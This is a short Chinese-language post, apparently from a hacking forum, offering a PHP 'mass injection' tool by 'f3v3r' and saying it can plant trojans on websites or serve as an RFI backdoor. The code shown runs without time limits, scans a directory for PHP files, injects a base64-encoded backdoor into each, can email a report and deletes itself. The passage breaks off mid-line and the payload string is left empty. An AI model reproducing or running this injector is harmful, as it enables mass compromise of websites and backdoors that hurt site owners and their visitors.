可以拿来挂马
也能拿来当RFI的后门注入
code都写明的，有需要的请自己看
后门写在$inj里面，要做base64 encode的Polymorphic
不希望这个东西被搞破坏的人拿去玩
懂原理的就自个儿收下吧

 

<?php set_time_limit(0); ignore_user_abort(1); # PHP Mass Injection Script by f3v3r ver.228 # |1| Look for PHP in directory.|2| Check injected. # |3| Inject script. |4|Can email report to you. $inj =''; $log_email = 0;//change 1 enable, somehow they can trace you by this way. $email = 'f3v3r@cc.cc'; $log_report = 1; $filename = '__log.html'; $delete_me = 1; echo '<title>f3v3r injection toolz</title><center><strong>Defacez aint hack, r00tz r.</strong></center><br>'; $dir = opendir('.'); $site=(isset(